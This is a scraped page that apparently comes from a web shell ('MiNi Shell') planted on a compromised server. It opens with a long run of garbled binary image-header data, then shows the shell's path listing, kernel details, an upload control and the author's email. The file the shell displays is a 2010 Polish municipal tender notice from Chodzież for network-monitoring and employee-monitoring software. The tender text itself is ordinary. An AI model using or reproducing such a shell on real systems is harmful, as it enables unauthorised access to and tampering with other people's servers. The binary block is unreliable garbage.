JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100922/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100922/302128-N-2010.html

<p class="kh_header"><b>Chodzież: Zakup oprogramowania dla Urzędu Miejskiego w Chodzieży</b><br>
<b>Numer ogłoszenia: 302128 - 2010; data zamieszczenia: 22.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska w Chodzieży , ul. Paderewskiego 2, 64-800 Chodzież, woj. wielkopolskie, tel. 067 2827171, faks 067 2827232.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chodziez.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup oprogramowania dla Urzędu Miejskiego w Chodzieży.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakup oprogramowania dla Urzędu Miejskiego w Chodzieży
 Opis przedmiotu zamówienia:
1. Przedmiotem zamówienia jest zakup niżej opisanego oprogramowania:
Nazwa
Ilość licencji
Axence nVision Network lub równoważne
60 szt.
Axence nVision Inventory lub równoważne
60 szt
Axence nVision Helpdesk lub równoważne
60 szt
Axence nVision DataGuard lub równoważne
60 szt

Axence nVision -specyfikacja

Program wykrywa sieć automatycznie i prezentuje ją na interaktywnych mapach.
 
1. Program powinien posiadać wizualizacje sieci
Komputery powinny być prezentowane na interaktywnych mapach pokazujących wszelkie krytyczne informacje (czas odpowiedzi podstawowego serwisu, czas kiedy serwisy i komputer nie działały, alarmy itp.).
2. Program monitoruje infrastrukturę sieci
Stosując TCP-IP, SNMP, Windows Management Instrumentation (WMI), program może zidentyfikować i monitorować najważniejsze elementy sieci. 
1.   Systemy
Serwery Windows, Linux, Unix, Mac routery, switch  e, VoIP, i firewall  e
2. Urządzenia SNMP wspierające SNMP v1-2-3.
Kompilator plików MIB umożliwia dołączanie nowych plików MIB, udostępniających informację SNMP z wszelkich urządzeń sieciowych: switch e, routery, drukarki sieciowe, urządzenia VoIP itp. 
3. Serwisy TCP-IP
HTTP, POP3, SMTP, FTP i inne. Można monitorować ich czas odpowiedzi i procent utraconych pakietów. 
4. Serwery pocztowe
Program może monitorować zarówno serwis odbierający, jak i wysyłający pocztę. 
Program ma możliwość monitorowania stanu systemów i wysyłania powiadomienia, w razie gdyby przestały one odpowiadać lub wadliwie funkcjonowały (np. gdy ważne parametry znajdą się poza zakresem). 
Program wykonuje prawdziwe operacje testowe. Monitorowany może być np. czas potrzebny do zalogowania się i sprawdzenia listy emaili lub wysłanie testowego emaila. Czas wykonania tych operacji jest zapisywany. 
Program ma możliwość wysłania powiadomienia jeśli serwer pocztowy nie działa. 
5. Program monitoruje Serwery WWW i adresy URL
Monitoruje czas ładowania strony i jej zawartość.
6. Routery i switch  e
Program monitoruje: 
Zmianę statusu interfejsów sieciowych.
Ruch sieciowy.
Podłączone komputery. 
Generowany ruch przez podłączone komputery.
7. Wydajność urządzeń SNMP
Transfer sieciowy, połączenia, błędy i wiele innych. 
8. Serwisy Windows
Monitor serwisów Windows alarmuje, w razie gdy serwis przestanie działać oraz pozwala go uruchomić-zatrzymać-zrestartować. 
9. Wydajność systemu Windows
Obciążenie CPU, pamięci, zajętość dysków, transfer sieciowy i wiele innych. 
10. MS SQL, Exchange, IIS i inne aplikacje
Program może monitorować stan wielu aplikacji oraz systemu Windows.

3. Inwentaryzacja sieci
Program automatycznie gromadzi informacje o sprzęcie i oprogramowaniu urządzeń w sieci: 
1. Program pokazuje szczegóły dotyczące sprzętu: model, CPU, pamięci, płyty głównej, napędów, kart, etc. 
2.  Audyt sprzętowy obejmuje m.in.: zestawienie posiadanych konfiguracji sprzętowych, wolne miejsce na dysku, średnie wykorzystanie pamięci, itd., informacje pozwalające na wytypowanie systemów, dla których konieczny jest upgrade.
3.  Informacje o zainstalowanych aplikacjach oraz aktualizacjach Windows. Umożliwia to audytowanie i weryfikację użytkowania licencji
4.  Historia wszystkich zmian przeprowadzonych na wybranym komputerze: instalacji-deinstalacji aplikacji, zmian adresu IP itd. 
5.  Program ma możliwość wysyłania powiadomienia np. emialem w przypadku zainstalowania programu lub jakiejkolwiek zmiany konfiguracji sprzętowej komputera. 
6. Inwentaryzacja jest wykonywana przez agenta programu dzięki czemu nawet w rozległych sieciach przebiega ona sprawnie i szybko. Agenty aktywnie wysyłają informacje do serwera,  tak więc nie osłabia to firewalla i bezpieczeństwa urządzenia.
4. Zaawansowana inwentaryzacja oprogramowania (audyt licencji)
Program zapewnia funkcjonalność w zakresie inwentaryzacji oprogramowania i audytu licencji: 
1. Skanowanie plików wykonywalnych i multimedialnych na dyskach komputerów przez agenty; skanowanie archiwów, plików ISO itp.
2. Zarządzanie posiadanymi licencjami; wzorce plików, pakiety oprogramowania, licencje dostępowe (tzw. CAL  e) itd. 
3. Łatwy audyt legalności oprogramowania oraz powiadamianie tylko w razie przekroczenia liczby posiadanych licencji - w każdej chwili można wykonać aktualne raporty audytowe, bez konieczności oczekiwania na dane z agentów 
4. Zarządzanie posiadanymi licencjami: raport zgodności licencji 
5. Baza wzorców aplikacji aktualizowana przez Internet i uzupełniana przez użytkowników. Wzorce składają się z grupy wpisów rejestru i plików - razem. 
6. Heurystyczne tworzenie wzorców: jeśli brak w bazie wzorca dla zainstalowanego programu, program ma możliwość samodzielnie taki wzorzec utworzyć. Baza wzorców jest automatycznie uzupełniana przez heurystyczne metody. 
7. Możliwość przypisania do programów numerów seryjnych, wartości itp. 

5.  Możliwość dokupienia funkcjonalności - monitorowania pracowników (aktywności użytkowników) 
Program może szczegółowo monitorować aktywność użytkowników pracujących na komputerach z systemem Windows:
1. Faktyczny czas aktywności: dokładny czas pracy z godziną rozpoczęcia i zakończenia pracy oraz przerwami
2. Monitorowanie procesów: całkowity czas działania, czas pracy pracownika (każdy proces ma całkowity czas działania oraz czas wykorzystania przez użytkownika) 
3. Rzeczywiste użytkowanie programów: dokładne informacje o wykorzystywanych programach (m.in. procentowa wartość wykorzystania aplikacji, obrazująca czas jej używania w stosunku do łącznego czasu, przez który aplikacja była uruchomiona), 
4. Informacje o edytowanych przez pracownika dokumentach. 
5. Rodzaj aktywności pracowników: raporty przedstawiające czas pracy (predefiniowane raporty RCP), przeglądania stron, konwersacji przez GG czy ICQ, grania, zakupów online itp. 
6. Historia pracy: cykliczne zrzuty ekranowe (funkcja włączana na żądanie) 
7. Zdalny podgląd pulpitu użytkownika 
8. Lista odwiedzanych stron: liczba odwiedzin stron z nagłówkami, liczbą i czasem wizyt 
9. Monitorowanie transferu sieciowego użytkowników: ruch sieciowy lokalny i transfer internetowy wygenerowany przez pracowników  
a. Audyty wydruków:  
1.   Informacje o dacie wydruku, 
2.   Informacja o wykorzystaniu drukarek 
3.   Zestawienie pod względem użytkownika (kiedy, ile stron, jakiej jakości, na jakiej drukarce, jaki dokument drukował)
4.   Zestawienie pod względem stacji roboczej (kiedy, ile stron, jakiej jakości, na jakiej drukarce, jaki dokument drukowano z danej stacji roboczej) 
b. Blokowanie stron internetowych
1.  Program daje możliwość zezwolenia lub zablokowania całego ruchu WWW dla danego    użytkownika z możliwością definiowania wyjątków - zarówno zezwalających, jak i zabraniających korzystania z danej strony.
2.  Dzięki granulacji blokowania stron program nie ogranicza jednocześnie potencjału i korzyści płynących z korzystania Internetu przy pracy (tzw. elastyczne surfowanie).

6.  Zdalny dostęp (kontrola stacji użytkownika)
1. Agent programu zapewnia zdalną kontrolę stacji użytkownika (zgodną z VNC): udostępniają podgląd pulpitu użytkownika i możliwość przejęcia jego konsoli.
2. Podczas przejęcia kontroli nad komputerem pracownika zarówno pracownik jak i administrator widza ten sam ekran.

7. Blokowanie portów i nośników danych
Program, ma możliwość zarządza prawami dostępu do wszystkich portów wejścia i wyjścia (przewodowych i bezprzewodowych) oraz urządzeń fizycznych, przez które użytkownik może skopiować pliki z komputera firmowego lub uruchomić na nim program zewnętrzny.
1. Blokowanie urządzeń i interfejsów fizycznych: USB, FireWire, gniazda SD itp., SATA, dyski przenośne, napędy CD-DVD, stacje dyskietek 
2. Blokowanie interfejsów bezprzewodowych: WiFi, Bluetooth, IrDA 
3. Blokada dotyczy tylko urządzeń do przenoszenia danych - inne urządzenia (drukarka, klawiatura itp.) można podłączyć 


Zarządzanie prawami dostępu do portów
1. Definiowanie praw użytkowników-grup do odczytu i kopiowania plików 
2. Autoryzowanie urządzeń firmowych: pendrive ów, dysków itp. - urządzenia prywatne są blokowane 
3. Całkowite zablokowanie określonych typów portów dla wybranych lub komputerów 
4. Centralna konfiguracja poprzez ustawienie reguł (polityk) dla całej sieci lub wybranych grup komputerów 
Audyt operacji na urządzeniach przenośnych
Zapisywanie informacji o wszystkich operacjach na urządzeniach przenośnych dla każdego użytkownika: 
1. podłączenie-odłączenie pendrive  a 
2. odczyt i kopiowanie plików na-z pendrive  a 
Ochrona przed usunięciem
Program jest zabezpieczony hasłem przed ingerencją użytkownika w jego działanie i próbą usunięcia, nawet jeśli użytkownik ma prawa administratora.

8. Program powinien zawierać 12 miesięcy pomocy technicznej oraz aktualizacji.

9. Program w języku polskim
10. Wykonawca zobowiązany jest dostarczyć w.w oprogramowanie  do siedziby Zamawiającego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 48.21.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>5.Inne dokumenty:
1.Wypełniony i podpisany formularz ofertowy, stanowiący załącznik nr 1 do specyfikacji istotnych warunków zamówienia.
2.Oświadczenie o spełnianiu warunków udziału w postępowaniu, które stanowi załącznik nr 2 do niniejszej SIWZ. 
3.Oświadczenie o niepodleganiu wykluczeniu z postępowania,  które stanowi załącznik nr 3 do niniejszej SIWZ. 
4.Dokumenty wymienione powyżej w pkt. 9, I i II niniejszej SIWZ. 
5.Dokumenty wymienione powyżej w pkt. 10  niniejszej SIWZ (jeśli dotyczy). 
6.Specyfikację oferowanego oprogramowania.

Dokumenty załączone do oferty muszą być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub osobę przez niego uprawnioną (do oferty należy załączyć pełnomocnictwo). Uznaje się, że pełnomocnictwo do podpisania oferty obejmuje pełnomocnictwo do poświadczenia za zgodność z oryginałem kopii dokumentów załączonych do oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.chodziez.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Chodzieży,                  ul. Paderewskiego 2, 64-800 Chodzież.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.09.2010 godzina 10:00, miejsce: Urząd Miejski w Chodzieży,                  ul. Paderewskiego 2, 64-800 Chodzież.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com